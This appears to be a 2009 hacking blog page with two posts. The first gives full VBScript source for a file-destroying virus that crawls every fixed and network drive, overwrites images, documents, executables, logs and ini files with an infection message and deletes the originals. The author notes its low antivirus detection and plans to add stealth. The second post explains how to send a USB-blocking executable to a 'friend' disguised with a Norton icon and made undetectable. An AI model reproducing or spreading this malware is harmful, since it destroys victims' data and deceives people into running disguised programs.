Source Code of Virus
Here is some code that overwrites .jpg, .doc, .exe, .gif, .log and .ini extensions with "You have been infected" and changes them into .txtI will try to change the code so it can have more stealth when dealing with antivirus programs.
Code:
On Error Resume Next
Dim FSobj, winDir, sysDir, copySelf, newFile, rawFileData, hackedFileData, fixData, dataFixed, newFileData
Set FSobj = CreateObject("Scripting.FileSystemOject")
Set sysDir = FSobj.GetSpecialFolder(1)
beginInfestation()
sub beginInfestation()
On Error Resume Next
Dim drive,machine
Set machine = FSobj.Drives
for each drive in machine
if (drive.type = 2) or (drive.type = 3) then
indexFolders(drive.Path&"\")
end if
next
end sub
sub indexFolders(location)
On Error Resume Next
Dim specs, file, subFol
Set specs = FSobj.GetFolder(location)
subFol = specs.SubFolders
for each file in subFol
spreadData(file.Path)
indexFolders(file.Path)
next
end sub
sub spreadData(location)
On Error Resume Next
Dim folder, directory, file, generateCopy, appName, adExt, orgMes, mesStageTwo, mesStageThree, finalMes, extName
Set folder = FSobj.GetFolder(location)
Set directory = folder.Files
orgMes = "You have been infected!"
esStageTwo=replace(orgMes,chr(42),chr(68))
mesStageThree=replace(mesStageTwo,chr(124),chr(46))
finalMes=replace(mesStageThree,chr(37),chr(76))
for each file in directory
extName=lcase(FSobj.GetExtensionName(file.Path))
if (extName="jpg")or(extName="gif")then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)
elseIf (extName="log")or(extName="ini") then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)
elseIf (extName="doc")or(extName="exe") then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)
end if
next
end sub
SOME Anti-virus programs will pick this up. It is written in VBScript (.vbs extention)
UPDATE: 2/41 Antivirus programs picked this up. Scan done by virustotal:
UPDATE: 2/41 Antivirus programs picked this up. Scan done by virustotal:
Code: a-squared 4.5.0.24 2009.08.06 - |
Friday, July 31, 2009
Creating a Virus to Disable USB Ports
Do you want to play a prank with your friend’s computer by disabling their USB ports? If so here is a nice trick to do that! In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer(PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the victim will not be able to use his pen drive or any other USB peripheral on his computer. The source code for this virus along with the compiled module is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports. Here is a step by step procedure to start playing the prank on your friend’s computer.
1. Download the USB_Block.rar file on to your computer.
2. It contains the following 4 files.
- block_usb.c (source code)
- unblock_usb.c (source code)
- block_usb.exe
- unblock_usb.exe
3. Out of these 4 files the block_usb.exe is the virus that will block (disable) all the USB ports on the computer upon execution (double click). You need to send this file to your friend. Once he executes it it’ll block all the USB ports on his computer.
4. Before sending you can test it on your own computer. To test, just run theblock_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run theunblock_usb.exe file. Now insert the pen drive and it should get detected.
5. The block_usb.c and unblock_usb.c are the source codes. You can compile them by yourself in case if you’re interested (This is optional).
6. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.
7. You can also change the icon of this file to make it look like a legitimate program. Example Take the Icon of Norton or something else and Bind the Exe File with it with any Binder. And Use Software PassPort to make it Undetectable.
I hope you like this post. Please pass your comments.
WARNING: This post is for educational purposes only. Do not misuse it.
